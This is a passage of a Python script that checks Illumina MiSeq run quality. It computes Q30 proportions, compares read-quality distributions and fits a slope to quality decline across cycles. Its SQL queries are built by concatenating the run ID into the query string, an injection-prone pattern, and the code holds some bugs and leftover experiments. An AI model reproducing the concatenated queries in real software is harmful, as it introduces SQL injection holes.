Only \" + str(\"%.2f\" %perc_diff_med_cd) + \"% passing filter.\") \n \n #Large range in cluster densities over different cycles\n #I DO NOT HAVE ACCESS TO THIS DATA- Only have tilewise information and nothing regarding cycle\n\n '''\n ##Number/Proportion of bases >Q30\n cursor.execute(\"\"\" SELECT (SUM(Q30)+SUM(Q31)+SUM(Q32)+SUM(Q33)+SUM(Q34)+SUM(Q35)\n +SUM(Q36)+SUM(Q37)+SUM(Q38)+SUM(Q39)+SUM(Q40)+SUM(Q41)+SUM(Q42)+SUM(Q43)\n +SUM(Q44)+SUM(Q45)+SUM(Q46)+SUM(Q47)+SUM(Q48)+SUM(Q49)+SUM(Q50)) /\n (SUM(Q01)+SUM(Q02)+SUM(Q03)+SUM(Q04)+SUM(Q05)+SUM(Q06)+SUM(Q07)+SUM(Q08)+\n SUM(Q09)+SUM(Q10)+SUM(Q11)+SUM(Q12)+SUM(Q13)+SUM(Q14)+SUM(Q15)+SUM(Q16)+\n SUM(Q17)+SUM(Q18)+SUM(Q19)+SUM(Q20)+SUM(Q21)+SUM(Q22)+SUM(Q23)+SUM(Q24)+\n SUM(Q25)+SUM(Q26)+SUM(Q27)+SUM(Q28)+SUM(Q29)+SUM(Q30)+SUM(Q31)+SUM(Q32)+\n SUM(Q33)+SUM(Q34)+SUM(Q35)+SUM(Q36)+SUM(Q37)+SUM(Q38)+SUM(Q39)+SUM(Q40)+\n SUM(Q41)+SUM(Q42)+SUM(Q43)+SUM(Q44)+SUM(Q45)+SUM(Q46)+SUM(Q47)+SUM(Q48)+\n SUM(Q49)+SUM(Q50))\n FROM QualityMetrics\n WHERE QualityMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n qual_metrics_Q30 = cursor.fetchall()\n qual_over_Q30 = qual_metrics_Q30[0][0]\n print(qual_over_Q30)\n '''\n '''\n #Testing\n qual_over_Q30 = 0.88\n qual_over_Q30 = 0.78\n '''\n '''\n if qual_over_Q30 < 0.85:\n raise Exception(\"Only \" + str(\"%.0f\" %(qual_over_Q30*100)) + \"% of bases over Q30\")\n elif qual_over_Q30 < 0.90:\n warnings.warn(\"Fewer than 90% of bases are over Q30\")\n '''\n #This could be a plot of number of reads valued at each quality bin\n #Currently would require a separate data extract as the variable stores only the total proportion\n #See below where have all the quality metrics\n \n #Look at reads separately\n cursor.execute(\"\"\" SELECT *\n FROM QualityMetrics\n WHERE QualityMetrics.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n qual_metrics = cursor.fetchall()\n qual_metrics_arr = np.asarray(qual_metrics)\n #Number of columns in the quality metrics array\n qual_num_cols = (len(qual_metrics_arr[0,:]))\n #Number of rows in the quality metrics array\n qual_num_rows = (len(qual_metrics_arr[:,0]))\n #Create array excluding the MiSeqRunID (which cannot be force converted to an integer)\n qual_metrics_arr_mod = np.concatenate((qual_metrics_arr[:,0:3],qual_metrics_arr[:,4:qual_num_cols]),axis=1)\n #Force conversion of array to integer type (necessary as db driver retrieves strings)\n qual_metrics_arr_mod_int = qual_metrics_arr_mod.astype(np.int64) #Need a longint here or get a buffer overflow later\n #print(qual_metrics_arr_mod_int)\n\n #Need to sort the data based on cycle if going to slice it later (3rd column)\n qual_metrics_arr_mod_int_sorted = qual_metrics_arr_mod_int[qual_metrics_arr_mod_int[:,2].argsort()]\n #print(qual_metrics_arr_mod_int_sorted)\n\n # Remove the three entries that aren't actual quality bins\n qual_metrics_arr_mod_int_sorted_subs = (qual_metrics_arr_mod_int_sorted[:,3:qual_num_cols])\n #print(qual_metrics_arr_mod_int_sorted_subs)\n #print(sum(qual_metrics_arr_mod_int_sorted_subs))\n #print(np.cumsum(sum(qual_metrics_arr_mod_int_sorted_subs)))\n\n #Work out the Q30 proportion over the entire array\n Q30_qual_arr = qual_metrics_arr_mod_int_sorted_subs[:,29:len(qual_metrics_arr_mod_int_sorted_subs[0,:])] # 29 is the position of Q30\n Q30_number = (np.sum(Q30_qual_arr))\n #print(Q30_number) #This is correct- checked against Excel spreadsheet\n Qtotal_number = (np.sum(qual_metrics_arr_mod_int_sorted_subs))\n #print(Qtotal_number) #This is correct- checked against Excel spreadsheet\n 
prop_Q30_qual = (float(Q30_number)/float(Qtotal_number))\n\n #print(prop_Q30_qual)\n #prop_Q30_qual = 0.755475737227 #Testing\n \n #Get the recommended Q30 thresholds and test if run meets the criteria\n #Source: http://www.illumina.com/systems/miseq/performance_specifications.html\n #For Q30 averaged across entire run\n #Logic is a bit awkward, but it works- revisit later to tidy up\n illumina_Q30_threshold_bins = {\"2\":(25,150,250),\"3\":(75,300)}\n illumina_Q30_threshold_bins_for_kit = illumina_Q30_threshold_bins.get(str(kit_version),None)\n \n #print(illumina_Q30_threshold_bins_for_kit)\n #print(type(read1_length))\n \n #read1_length = 156 #This is a test\n #read1_length = 300\n #read1_length = 10\n #read1_length = 150\n #read1_length = 149 \n try:\n cycle_kit = -1\n for threshold in illumina_Q30_threshold_bins_for_kit:\n if (read1_length == threshold) | ((read1_length-1) == threshold):\n #print(\"go\") #check for triggering\n cycle_kit = threshold\n\n if (cycle_kit == -1):\n ind_of_next_higher = bisect.bisect(illumina_Q30_threshold_bins_for_kit, read1_length)\n if ind_of_next_higher > (len(illumina_Q30_threshold_bins_for_kit)-1): #handle case where number is higher than last one in tuple. -1 as python 0 indexed.\n cycle_kit = illumina_Q30_threshold_bins_for_kit[(ind_of_next_higher-1)]\n else:\n cycle_kit = illumina_Q30_threshold_bins_for_kit[ind_of_next_higher]\n illumina_Q30_thresholds = {(\"2\",\"25\"):(0.90),(\"2\",\"150\"):(0.80),(\"2\",\"250\"):(0.75),(\"3\",\"75\"):(0.85),(\"3\",\"300\"):(0.70)}\n Q30_illumina_threshold = illumina_Q30_thresholds.get((str(kit_version),str(cycle_kit)),None)\n \n #Now handle the cases where there's no kit\n except TypeError:\n print(\"No Q30 threshold available for kit version \" + str(kt) + \". Q30 threshold set to 85%\") # Set a fallback value for if threshold value not in dictionary\n Q30_illumina_threshold = 0.85\n \n if prop_Q30_qual < Q30_illumina_threshold:\n #warnings.warn(\"Fewer than 90% of bases are over Q30\")\n print(\"Number of bases over Q30 failed to meet Illumina recommended thresholds\")\n print(\"Only \" + str(\"%.0f\" %(prop_Q30_qual*100)) + \"% of bases over Q30\")\n\n #print(Q30_qual_arr)\n #print(qual_metrics_arr_mod_int_sorted_subs)\n\n ##To split into separate reads based on number of cycles\n ##There is a cycle per each tile, which includes top and bottom surface (so 2*number of tiles)\n ##Obtain the number of tiles\n cursor.execute(\"\"\" SELECT MiSeqRun.NumTiles\n FROM MiSeqRun\n WHERE MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n num_tls = cursor.fetchall()[0][0]\n \n #Obtain the number of surfaces\n cursor.execute(\"\"\" SELECT MiSeqRun.NumSurfaces\n FROM MiSeqRun\n WHERE MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\")\n num_surfaces = cursor.fetchall()[0][0]\n #print(num_surfaces) \n #print(num_tls)\n #print(read1_length)\n #print(read2_length)\n\n #This sums up all the values column-wise- could use to replace separate data extract above\n #print(np.sum(qual_subs_arr_int, axis = 0))\n\n #This sums up all the values row-wise- the different summed totals probably reflect the different reads\n #This is of limited use if it is not sorted\n #print(np.sum(qual_subs_arr_int, axis = 1))\n\n '''\n Testing sorting\n a = np.array([[1,2,3],[1,4,5],[1,1,6]])\n ab = a[a[:,1].argsort()]\n print(a)\n print(ab)\n '''\n\n #How the reads (without the index reads) extend\n r1_end = num_surfaces*num_tls*read1_length\n #read1\n first_read_qual = qual_metrics_arr_mod_int_sorted[0:r1_end,:]\n #read2\n r2_start = r1_end + 
(ind_reads*num_surfaces*num_tls)\n #print(ind_reads)\n second_read_qual = qual_metrics_arr_mod_int_sorted[r2_start:qual_num_rows,:]\n #print(second_read_qual)\n\n #Subset of array containing bins Q01-Q50 only- start from position 3 as started from the int array so\n #MiSeqRunID has already been removed- this slicing has been tested to slice at the correct position\n first_read_qual_subs =(first_read_qual[:,3:qual_num_cols])\n second_read_qual_subs =(second_read_qual[:,3:qual_num_cols])\n\n #print(np.sum(first_read_qual_subs,axis=0))\n '''\n #Check index of Q30 (checked against Excel spreadsheet)- it is at index 32 in the full array\n print(first_read_qual)\n print(first_read_qual[:,1:3]) #Get the tile and cycle number for comparison with the entry below\n print(first_read_qual[:,32]) #Will be -3 in the substring- this is checked too- need full index to get correct entry in Excel sheet\n #Check values match- they do\n print(first_read_qual_subs[:,29])\n '''\n\n #Find the proportion of Q30 for the first read\n Q30_r1_arr = first_read_qual_subs[:,29:len(first_read_qual_subs[0,:])]\n Q30_r1 = (np.sum(Q30_r1_arr))\n #print(Q30_r1) #This is correct checked against Excel spreadsheet\n Qtotal_r1 = (np.sum(first_read_qual_subs))\n #print(Qtotal_r1) #This is correct checked against Excel spreadsheet\n prop_Q30_r1 = (float(Q30_r1)/float(Qtotal_r1))\n #print(prop_Q30_r1*100)\n\n #Find the proportion of Q30 for the second read\n if r2_start < (len(qual_metrics_arr_mod_int_sorted)):\n #Handle the case where there is no second read\n Q30_r2_arr = second_read_qual_subs[:,29:len(second_read_qual_subs[0,:])]\n Q30_r2 = (np.sum(Q30_r2_arr))\n #print(Q30_r1) #This is correct checked against Excel spreadsheet\n Qtotal_r2 = (np.sum(second_read_qual_subs))\n #print(Qtotal_r1) #This is correct checked against Excel spreadsheet\n prop_Q30_r2 = (float(Q30_r2)/float(Qtotal_r2))\n #print(prop_Q30_r2*100)\n\n #Is there a big difference in >Q30 between r1 and r2?- Test for significance- this is later, first test spread of quality scores\n #Just look to see if there is a difference in the spread of quality scores perhaps\n #For this will need to create a 1D distribution across the range of quality scores\n #We already have this with the first/second_read_qual_subs- just need to sum it over the correct axis\n r1_qual_distn = np.sum(first_read_qual_subs,axis=0)\n r2_qual_distn = np.sum(second_read_qual_subs,axis=0)\n\n #Non-parametric, so use rank sum test (Wilcoxon?)\n #Need to figure out a useful test for this kind of frequency data\n '''\n Use Mann Whitney for independent samples? 
Alternative is Kolmogorov-Smirnov.\n Mann Whitney test deals better with ties (values that are the same and need to be converted into rank)\n We have got a fair bit of tied data (all 0 values and huge numbers of values in same Q bin), so I prefer Mann-Whitney to K-S.\n K-S is more sensitive to changes in shape of distribution etc though.\n Have tried Chi-Sq and Fisher's exact test, but they can't be used because there's more than 2x2 (Fisher) and\n The ChiSq test cannot be used because of the 0s in the 'expected' frequencies as well\n '''\n '''\n #First unpack the data to its non-binned form\n qual_range = np.arange(1,51) #Known a priori that the range of quality values is Q1 to Q50\n '''\n #Unpack the data to its non-binned form\n qual_range = np.arange(1,51) #Known a priori that the range of quality values is Q1 to Q50\n \n #print(np.cumsum(r1_qual_distn)) # Check numbers match with the length of the unpacked array\n #r1_qual_raw = np.repeat(qual_range,r1_qual_distn)# This takes too much memory\n #r2_qual_raw = np.repeat(qual_range,r2_qual_distn)# This takes too much memory\n \n #K-S downsampling to try to avoid out of memory error\n r1_qual_distn_downsample = (np.divide(r1_qual_distn,1000))\n r2_qual_distn_downsample = (np.divide(r2_qual_distn,1000))\n \n '''\n pl.plot(r1_qual_distn_downsample)\n pl.plot(r2_qual_distn_downsample)\n pl.show()\n '''\n \n #'''THE QUAL RAW DONWSAMPLE DEFINITELY WANTS A 'DISCRETE' TEST OF SOME SORT\n r1_qual_raw_downsample = np.repeat(qual_range,(r1_qual_distn_downsample/1000)) # Not being used atm- have temp /1000 again 23/02\n r2_qual_raw_downsample = np.repeat(qual_range,(r2_qual_distn_downsample/1000)) # Not being used atm- have temp /1000 again 23/02\n \n k_s_statistic, k_s_pvalue = stat.ks_2samp(r1_qual_raw_downsample,r2_qual_raw_downsample)\n print(k_s_pvalue)\n #'''\n \n '''\n pl.plot(r1_qual_raw_downsample)\n pl.plot(r2_qual_raw_downsample)\n pl.show()\n '''\n \n '''\n m_w_statistic, m_w_pvalue = stat.mannwhitneyu(r1_qual_raw_downsample,r2_qual_raw_downsample)\n print(m_w_pvalue)\n '''\n \n '''\n print(r1_qual_raw_downsample)\n print(r2_qual_raw_downsample)\n #print(np.cumsum(r1_qual_distn))\n #print(np.sum(r1_qual_raw_downsample))\n '''\n #Create bins of quality data\n '''\n print(r1_qual_distn)\n print(r1_qual_distn[0:25])\n print(r1_qual_distn[25:49])\n print(np.sum(r1_qual_distn[0:25]))\n print(np.sum(r1_qual_distn[25:49]))\n print(np.sum(r1_qual_distn))\n '''\n '''\n r1_qual_bin_1 = np.sum(r1_qual_distn[0:25])\n r1_qual_bin_2 = np.sum(r1_qual_distn[25:49])\n r2_qual_bin_1 = np.sum(r2_qual_distn[0:25])\n r2_qual_bin_2 = np.sum(r2_qual_distn[25:49])\n \n r1_qual_chi = np.asarray((r1_qual_bin_1,r1_qual_bin_2))\n r2_qual_chi = np.asarray((r2_qual_bin_1,r2_qual_bin_2))\n \n print(r1_qual_chi)\n print(r2_qual_chi)\n \n chi, chi_p_value = stat.chisquare(r2_qual_chi,f_exp=r1_qual_chi)\n g, g_p_value = stat.power_divergence(r2_qual_chi,r1_qual_chi)\n \n print(chi_p_value)\n print(chi)\n \n print(g_p_value)\n '''\n '''\n #Can't put count data into this- need to change it if use\n k_s_statistic, k_s_pvalue = stat.ks_2samp(r1_qual_distn,r2_qual_distn) # Can't do this as only for continuous email\n '''\n #Downsampled data to avoid out of memory error\n #k_s_statistic, k_s_pvalue = stat.ks_2samp(r1_qual_raw_downsample,r2_qual_raw_downsample)\n #k_s_statistic, k_s_pvalue = stat.ks_2samp(r1_qual_raw_downsample,r2_qual_raw_downsample)\n #m_w_statistic, m_w_pvalue = stat.mannwhitneyu(r1_qual_raw_downsample,r2_qual_raw_downsample) #Never going to work because of 
bug\n #t_statistic, t_pvalue = stat.ttest_ind(r1_qual_raw_downsample,r2_qual_raw_downsample)\n #t_statistic, t_pvalue = stat.ttest_ind(r1_qual_raw_downsample,r1_qual_raw_downsample)\n \n k_s_statistic, k_s_pvalue = stat.ks_2samp(r1_qual_distn_downsample,r2_qual_distn_downsample)\n \n #print(r1_qual_distn)\n #print(r1_qual_distn.transpose())\n #chi2, chi_pvalue = stat.chisquare(r1_qual_distn,r2_qual_distn) #No\n #fish, fish_pvalue =\n #gtest, gtest_pvalue = (r1_qual_distn,r2_qual_distn,lambda_=\"log-likelihood\") \n #print(gtest_pvalue) \n #print(fish_pvalue)\n #print(np.mean(r1_qual_raw))\n #print(np.mean(r2_qual_raw))\n #print(m_w_pvalue)\n #print(m_w_statistic)\n #print(k_s_pvalue)\n #print(t_pvalue)\n \n #Bug in the Mann_Whitney p value calculation in scipy, so the p_value statistic is reported as nan\n ''' \n pl.figure(1)\n pl.plot(r1_qual_distn)\n pl.show()\n '''\n \n #print(k_s_pvalue)\n #print(np.isnan(t_pvalue))\n #print(t_pvalue)\n #print(k_s_pvalue)\n \n if (k_s_pvalue < 0.05): # 95% confidence, was at 0.05\n '''\n This may not be the right test, but I couldn't find anything better for now (tried ChiSq and Fishers\n but can't use them as there's more than 2x2 categories\n Also I don't think the data are binned- it is frequencies for each Q score...\n '''\n #warnings.warn(\"Big difference in median quality between read1 and read2\") # Was a median, but mann whitney tie correction broken in scipy\n print(\"Big difference in quality between read 1 and read 2\")\n elif np.isnan(k_s_pvalue):\n print(\"One of the reads has a problem. Could not compare\")\n \n '''\n pl.figure(1)\n pl.plot(r1_qual_distn)\n pl.figure(2)\n pl.plot(r2_qual_distn)\n #pl.figure(3)\n #pl.plot(r1_qual_raw)\n #pl.figure(4)\n #pl.plot(r2_qual_raw)\n pl.figure(5)\n pl.plot(r1_qual_raw_downsample)\n pl.figure(6)\n pl.plot(r2_qual_raw_downsample)\n pl.show()\n '''\n \n ##Abnormal patterns in data by cycle plot (% bases >Q30)\n #Generate a data by cycle plot\n\n #Locate the data which contains the quality information only\n #first_read_qual_subs\n #second_read_qual_subs\n ''' This was a check for the data match- it matches ok\n cursor.execute(\"\"\" SELECT QualByRow.MiSeqRunID,QualByRow.CycleID,\n OverQ30 AS OverQ30\n FROM QualByRow \n WHERE QualByRow.CycleID = QualByRow.CycleID\n AND QualByRow.MiSeqRunID = \"\"\" + \"'\" + run_for_import + \"'\" \"\"\"\n GROUP BY QualByRow.MiSeqRunID, QualByRow.CycleID, QualByRow.TileID \"\"\")\n quality_over_cycle_all = cursor.fetchall()\n quality_over_cycle_all_arr = np.asarray(quality_over_cycle_all)\n #print(quality_over_cycle_all_arr) #Try to match this data without the need for the extract\n\n\n x = quality_over_cycle_all_arr[:,1]\n y = quality_over_cycle_all_arr[:,2]\n\n pl.figure(10)\n f1 = pl.plot(x,y)\n '''\n\n #Find the data for the first read\n #print(first_read_qual_subs)\n #read1_length\n #Try to replicate the above plot without the data extract- need proportion of cycle over Q30\n #Do an array division number Q30 over total number for each cycle\n\n #Sum each row to get Q30 values\n #Read 1\n #Need to convert arrays to float arrays or the resultant division will be nearest int (so all 0s)\n Q30_by_row_r1 = np.ndarray.astype(np.sum(Q30_r1_arr,axis=1),float)\n #print(Q30_by_row_r1)\n #print(len(Q30_by_row_r1))\n #Sum each row to get total values\n #Need to convert arrays to float arrays or the resultant division will be nearest int (so all 0s)\n total_by_row_r1 = np.ndarray.astype(np.sum(first_read_qual_subs,axis=1),float)\n proportion_Q30_r1 = 
np.divide(Q30_by_row_r1,total_by_row_r1)\n proportion_Q30_r1 = np.nan_to_num(proportion_Q30_r1)\n\n #print(proportion_Q30_r1[::14])\n\n #print(np.sum(proportion_Q30_r1))\n\n #pl.plot(proportion_Q30_r1)\n #pl.show()\n\n #Pull out the medians- remember this array is already sorted by cycle\n #First chunk the array into slices based on cycle:- start:stop:step\n #Test the slicing on the full array that has the cycles included- easier validation that it is working properly\n #print(first_read_qual[:(num_tls*num_surfaces):,:]) # This is correct- checked against excel spreadsheet\n #print(first_read_qual[:(num_tls*num_surfaces)+1,:]) # Testing that the above does stop where cycle switches from 1 to 2\n\n #Therefore here we have the part without the identifiers for the first read below\n #print(first_read_qual_subs[:(num_tls*num_surfaces):,:])\n #First thing to do is get the numbers for each quality bin over cycle\n #sum this array subset column-wise- this is the number of falling into each quality category, from Q01 to Q50\n ''' This was for the first cycle, but need to calculate this for all of the cycles- so within the loop\n cycle_qual_binned_vals = np.sum(first_read_qual_subs[:(num_tls*num_surfaces):,:],axis = 0)\n print(cycle_qual_binned_vals)\n '''\n #Test iterating through the cycles in chunks, cause that is what will need to do\n #and then nest the other things within in \n\n '''\n lst = []\n print(first_read_qual[:,2])\n lst.append(first_read_qual[:,2][::(num_tls*num_surfaces)]) # This is correct, but I want the index of this value, not the value\n #lst.append(first_read_qual_subs[::(num_tls*num_surfaces),:]) #Test with the one with the cycle info included\n print(lst)\n '''\n\n '''\n for iq,xq in enumerate(first_read_qual[:,2]):\n print(first_read_qual[:,2]) # This is the whole row in which the cycle is stored\n print (first_read_qual[:,2][iq:])\n '''\n ''' \n for start in lst:\n print(first_read_qual_subs[start:(num_tls*num_surfaces):,:])\n start += (num_tls*num_surfaces)\n print(np.sum(first_read_qual_subs[start:(num_tls*num_surfaces):,:]))\n '''\n\n ''' This approach below is too slow\n #Multiply each entry by the Q to get the values\n quality_vals = np.arange(1,51,1,int)\n quality_vals_str = quality_vals.astype(str)\n #print(quality_vals_str)\n #print(type(quality_vals[0]))\n #Do an elementwise multiplication\n #Create a list to store the result\n bins = []\n #print(len(cycle_qual_binned_vals))\n #print(len(quality_vals))\n #print(np.multiply(cycle_qual_binned_vals_str*quality_vals))\n for i,s in enumerate(quality_vals_str):\n bins.append((s*cycle_qual_binned_vals[i]))\n print(bins)\n '''\n\n #Tested using first_read_qual so that I could see the cycle numbers, now swapped over to first_read_qual_subs\n r1_qual_med = []\n Q30_median_over_cycle_r1 = []\n for qual_i,qual in enumerate(first_read_qual_subs[:,2][::(num_tls*num_surfaces)]):\n #print(iq)\n #print(iq*(num_tls*num_surfaces))\n #print(num_tls*num_surfaces) #This is 28 (which is 2*14 as expected)\n #print(first_read_qual[(iq*(num_tls*num_surfaces)),2])\n #print(first_read_qual[(iq*(num_tls*num_surfaces)):((iq*(num_tls*num_surfaces))+(num_tls*num_surfaces))]) #Checked and this is the final entry\n quality_chunk = (first_read_qual_subs[(qual_i*(num_tls*num_surfaces)):((qual_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n #print(quality_chunk)\n\n cycle_qual_binned_vals = np.sum(quality_chunk,axis = 0) #Checked is correct for first cycle\n \n #print(np.sum(quality_chunk,axis = 1))\n #print(np.mean(np.sum(quality_chunk,axis = 
1)))\n            \n            #r1_med_qual_over_cycle.append(np.median(np.sum(quality_chunk,axis = 1)))\n            \n            '''\n            print(cycle_qual_binned_vals)\n            pl.plot(cycle_qual_binned_vals)\n            pl.show()\n            '''\n            \n            #Find the cumulative values on the array subset\n            cycle_qual_binned_vals_cum = (np.cumsum(cycle_qual_binned_vals))\n\n            #The median is at this position\n            med_rank = (np.sum(cycle_qual_binned_vals)/2.0)\n            #print(med_rank)\n            \n            #Proportion of total with this Q value\n            #Create an array of suitable dimensions with the total\n            #print(np.sum(cycle_qual_binned_vals))\n            #print(np.divide(cycle_qual_binned_vals,))\n            #Percentage of values falling into that Q value bin\n            quality_percentage = ((cycle_qual_binned_vals*100)/(float(np.sum(cycle_qual_binned_vals))))\n            #print(quality_percentage)\n            #Low down qualities with high percentages\n            '''\n            From the colour coding on the Illumina SAV, I think we will be looking at 15% and over in any\n            bin <Q30\n            '''\n            qual_perc_o15 = np.where(quality_percentage > 15)\n            #print(ans)\n            #print(ans[0])\n            #The Q score is ans+1 in this case as python is 0-indexed\n            qual_perc_o15_under_Q30 = np.where(qual_perc_o15[0] < 29)\n            #print(ans2)\n            #print(ans2[0])\n            #print(len(ans2))\n            #print(ans2[0].size)\n            #print(qual_i+1)\n            #print(qual_perc_o15_under_Q30[0].size)\n            if qual_perc_o15_under_Q30[0].size > 0:\n                print(\"High percentage of total clusters under Q30 for cycle \" + str(qual_i+1))\n            \n            \n            '''\n            #Testing for an even value of /2\n            med_rank = 9929106\n            '''\n\n            if(med_rank%1 != 0):\n                med_rank = int(med_rank+0.5)\n            elif(med_rank%1 == 0):\n                '''\n                This is not a true median as it should be the average of the two values\n                med_rank and med_rank+2. However, due to the number of tied values, I don't\n                really think it is likely to matter that much.\n                '''\n                med_rank = (med_rank)\n\n            #How to discover which bin this value is in\n            for cum_ind, cumulative_value in enumerate(cycle_qual_binned_vals_cum):\n                if (med_rank < cumulative_value) and (med_rank > (cycle_qual_binned_vals_cum[cum_ind-1])):\n                    qual_med = cum_ind+1 #As python is 0 indexed\n            \n            #So the median of each cycle is- should get 101 of these\n            #print(qual_med)\n            r1_qual_med.append(qual_med)    \n            #print(proportion_Q30_r1[::14])\n            #print(np.sum(proportion_Q30_r1))\n            #print(qual_i) #Runs through the number of cycles, so will want qual_i + num_tiles for segment\n            #print(proportion_Q30_r1[qual_i])\n            Q30_proportion_chunk = (proportion_Q30_r1[(qual_i*(num_tls*num_surfaces)):((qual_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n            #print(Q30_proportion_chunk)\n            #print(np.median(Q30_proportion_chunk))\n            Q30_median_over_cycle_r1.append((np.median(Q30_proportion_chunk)))\n        '''\n        pl.plot(Q30_proportion_chunk)\n        pl.show()\n        '''\n        r1_qual_med = np.asarray(r1_qual_med)\n        Q30_median_over_cycle_r1 = np.asarray(Q30_median_over_cycle_r1)\n\n        #Work out the degradation coefficient for the loss in quality over the read\n        Q30_median_over_cycle_r1_xdata = (np.arange(1,(len(Q30_median_over_cycle_r1)+1))) # Want it to start at 1 and stop at 101\n        #Fit a curve to the data\n        #pl.plot(Q30_median_over_cycle_r1_xdata,Q30_median_over_cycle_r1)\n\n        #function to fit- make it non-linear\n        #Initial guesses for parameters\n        p1 = 0.5\n        p2 = 0.5\n\n        '''\n        def func(x, p1,p2):\n            return p1*np.cos(p2*x) + p2*np.sin(p1*x)\n        '''\n\n        def func(x, p1,p2):\n            return(p1 * x + p2) #Linear\n\n        #def func_quad(x, p1,p2,p3):\n            #return(p1 * x**2 + p2 * x + p3)\n\n        #fit_func = func(Q30_median_over_cycle_r1_xdata, p1,p2)\n        #print(fit_func)\n\n        #p0_q = scipy.array([1,1,1])\n        \n        #This requires a function as input\n        optimal_vals_Q30_r1, covar_Q30_r1 = 
curve_fit(func,Q30_median_over_cycle_r1_xdata,Q30_median_over_cycle_r1, p0=(p1,p2))\n        #optimal_vals_Q30_r1_q, covar_Q30_r1_q = curve_fit(func_quad,Q30_median_over_cycle_r1_xdata,Q30_median_over_cycle_r1, p0_q)\n        #popt, pcov = curve_fit(func, xdata, ydata,p0=(1.0,0.2))\n\n        #Constrain the input values to exclude the outlying values at the beginning and end?- FUTURE WORK!!\n\n        #pl.plot(fit_func)\n        #pl.plot(-Q30_median_over_cycle_r1_xdata**2)\n\n        #pred = (optimal_vals_Q30_r1[0]*np.cos(optimal_vals_Q30_r1[1]*Q30_median_over_cycle_r1_xdata)) + (optimal_vals_Q30_r1[1]*np.sin(optimal_vals_Q30_r1[0]*Q30_median_over_cycle_r1_xdata))\n        linear_pred_r1 = (optimal_vals_Q30_r1[0] * Q30_median_over_cycle_r1_xdata + optimal_vals_Q30_r1[1])\n        #quad_pred = (optimal_vals_Q30_r1_q[0] * Q30_median_over_cycle_r1_xdata**2 + optimal_vals_Q30_r1_q[1] * Q30_median_over_cycle_r1_xdata + optimal_vals_Q30_r1_q[2])\n\n        #print(covar_Q30_r1)\n\n        '''\n        #Get the sum of squared residuals\n        residuals_r1 = Q30_median_over_cycle_r1 - func(Q30_median_over_cycle_r1_xdata,optimal_vals_Q30_r1[0],optimal_vals_Q30_r1[1])\n        fres = sum(residuals_r1**2)\n\n        #print(fres) # Measure of how good a fit the model is\n        '''\n\n        #Print out the slope of the line\n        slope_Q30_r1 = optimal_vals_Q30_r1[0]\n        #print(slope_Q30_r1)\n\n        #slope_Q30_r1 = -0.0006 #test\n\n\n        if abs(slope_Q30_r1) > 0.0005:\n            #warnings.warn(\"Big drop in quality towards the end of read 1\")\n            print(\"Big drop in quality towards the end of read 1\")\n\n        '''\n        #Create a nice illustrative plot- remember this isn't going to give any information at all about individual outliers, only a worrying trend\n        pl.figure(1)\n        pl.plot(Q30_median_over_cycle_r1_xdata,Q30_median_over_cycle_r1,'.')\n        pl.plot(Q30_median_over_cycle_r1_xdata,linear_pred_r1)\n        \n        pl.show()\n        '''\n        #pl.figure(3)\n        #pl.plot(Q30_median_over_cycle_r1_xdata,quad_pred)\n\n        #pl.show()\n\n        #So the median for cycle 1 of read 1 is \n        #print(qual_med)- STOPPED THIS PRINTING OUT FOR NOW WHILE WAS WORKING ON SOMETHING ELSE\n        #print(len(r1_qual_med)) # find out how many are stored- it is one per cycle\n\n        '''\n        print(first_read_qual_subs[::(num_tls*num_surfaces),:])\n        print(len(first_read_qual_subs[::(num_tls*num_surfaces),:]))\n        f = (len(first_read_qual_subs[::(num_tls*num_surfaces)]))\n        '''\n\n        #Read 2\n        if r2_start < (len(qual_metrics_arr_mod_int_sorted)):\n            #Handle the case where there is no second read\n            Q30_by_row_r2 = np.ndarray.astype(np.sum(Q30_r2_arr,axis=1),float)\n            total_by_row_r2 = np.ndarray.astype(np.sum(second_read_qual_subs,axis=1),float)\n            proportion_Q30_r2 = np.divide(Q30_by_row_r2,total_by_row_r2)\n            proportion_Q30_r2 = np.nan_to_num(proportion_Q30_r2)\n\n            #Pull out the medians\n            r2_qual_med = []\n            Q30_median_over_cycle_r2 = []\n            for qual_i,qual in enumerate(second_read_qual_subs[:,2][::(num_tls*num_surfaces)]):\n                quality_chunk = (second_read_qual_subs[(qual_i*(num_tls*num_surfaces)):((qual_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n                cycle_qual_binned_vals = np.sum(quality_chunk,axis = 0) #Checked is correct for first cycle    \n                #Find the cumulative values on the array subset\n                cycle_qual_binned_vals_cum = (np.cumsum(cycle_qual_binned_vals))\n                #The median is at this position\n                med_rank = (np.sum(cycle_qual_binned_vals)/2.0)\n                \n                quality_percentage = ((cycle_qual_binned_vals*100)/(float(np.sum(cycle_qual_binned_vals))))\n\n                '''\n                From the colour coding on the Illumina SAV, I think we will be looking at 15% and over in any\n                bin <Q30\n                '''\n                qual_perc_o15 = np.where(quality_percentage > 15)\n                #The Q score is ans+1 in this case as python is 0-indexed\n                
qual_perc_o15_under_Q30 = np.where(qual_perc_o15[0] < 29)\n if qual_perc_o15_under_Q30[0].size > 0:\n #As this is r2 need to add on read 1 and the index reads to get the cycle number- checked for correct length\n print(\"High percentage of total clusters under Q30 for cycle \" + str((qual_i+1)+read1_length+ind_reads))\n\n if(med_rank%1 != 0):\n med_rank = int(med_rank+0.5)\n elif(med_rank%1 == 0):\n '''\n This is not a true median as it should be the average of the two values\n med_rank and med_rank+2. However, due to the number of tied values, I don't\n really think it is likely to matter that much.\n '''\n med_rank = (med_rank)\n\n #How to discover which bin this value is in\n for cum_ind, cumulative_value in enumerate(cycle_qual_binned_vals_cum):\n if (med_rank < cumulative_value) and (med_rank > (cycle_qual_binned_vals_cum[cum_ind-1])):\n qual_med = cum_ind+1 #As python is 0 indexed\n \n #So the median of each cycle is- should get 101 of these\n #print(qual_med)\n r2_qual_med.append(qual_med) \n Q30_proportion_chunk = (proportion_Q30_r2[(qual_i*(num_tls*num_surfaces)):((qual_i*(num_tls*num_surfaces))+(num_tls*num_surfaces))])\n #print(Q30_proportion_chunk)\n #print(np.median(Q30_proportion_chunk))\n Q30_median_over_cycle_r2.append((np.median(Q30_proportion_chunk)))\n\n r2_qual_med = np.asarray(r2_qual_med)\n Q30_median_over_cycle_r2 = np.asarray(Q30_median_over_cycle_r2)\n\n #Work out the degradation coefficient for the loss in 